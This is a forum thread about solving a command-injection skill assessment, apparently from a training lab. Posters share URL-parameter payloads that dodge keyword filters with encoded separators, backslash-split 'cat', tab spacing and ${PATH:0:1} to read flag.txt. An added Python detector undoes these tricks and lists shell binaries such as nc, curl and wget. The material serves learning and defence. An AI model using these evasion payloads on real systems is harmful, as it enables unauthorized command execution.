I solved Command Injection Skill Assessment with payload:
?to=&from=2380029473.txt%26c\a\t%09${PATH:0:1}flag.txt&finish=1&move=1
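Added defensive example (not from the thread's author): the payload above evades naive keyword filters by URL-encoding the `&` separator, splitting `cat` with backslashes, using a tab as the argument separator and deriving `/` from `${PATH:0:1}`. A filter or log-review script has to undo those tricks before matching; the list of flagged binaries is an assumption for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample query string mirroring the thread's payload (not captured traffic).
SAMPLE_QUERY = "to=&from=2380029473.txt%26c\\a\\t%09${PATH:0:1}flag.txt&finish=1&move=1"

# Command separators as the shell sees them after decoding.
SEPARATORS = re.compile(r"[;&|`\n]|\$\(")
# Assumed watch-list of binaries that should never appear in a filename parameter.
SHELL_BINARIES = {"cat", "ls", "id", "whoami", "sh", "bash", "nc", "curl", "wget"}


def normalize(value: str) -> str:
    """Collapse common filter-evasion tricks into what the shell would execute."""
    s = unquote(value)                        # %26 -> &, %09 -> tab, %0a -> newline
    s = s.replace("\\", "")                   # c\a\t -> cat (backslash is a no-op in unquoted words)
    s = re.sub(r"\$\{PATH:0:1\}", "/", s)     # first char of $PATH is always "/"
    s = re.sub(r"\$\{IFS\}|\$IFS", " ", s)    # IFS expands to whitespace
    s = re.sub(r"\t+", " ", s)                # tabs separate arguments like spaces
    return s


def find_injection(param_value: str):
    """Return the normalized value and injected command, or None if clean."""
    s = normalize(param_value)
    if not SEPARATORS.search(s):
        return None
    injected = SEPARATORS.split(s, maxsplit=1)[1].strip()
    first_word = injected.split(" ", 1)[0].lstrip("/").split("/")[-1]
    if first_word in SHELL_BINARIES:
        return {"normalized": s, "command": first_word}
    return None


def scan_query(query: str) -> dict:
    """Check every parameter of a raw query string; encoded %26 stays in its parameter."""
    findings = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        hit = find_injection(value)
        if hit:
            findings[key] = hit
    return findings


if __name__ == "__main__":
    print(scan_query(SAMPLE_QUERY))
```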
Thank you! But what is your logic to get there? When I try to inject, I do a search for something random and then I try to inject here:
ajax=true&content=poc&path=.&type=search%26c\a\t%09${PATH:0:1}flag.txt
How did you come to the conclusion of injecting into the URL and not into the Burp Suite field, and where did you find &from=? I only see /index.php?to=
I'd like to add a "+" to the questions here. I'm also struggling to find the correct position to inject... I found the "from" parameter by clicking around in the app... But I could not inject anything really helpful until now... ZAP tells me a few "reflected" injections (such as "i:d" resulting in "Error while moving: mv: cannot stat '/var/www/html/files/i:d': No such file or directory")... not sure if that is of any help, since your question is a bit old now.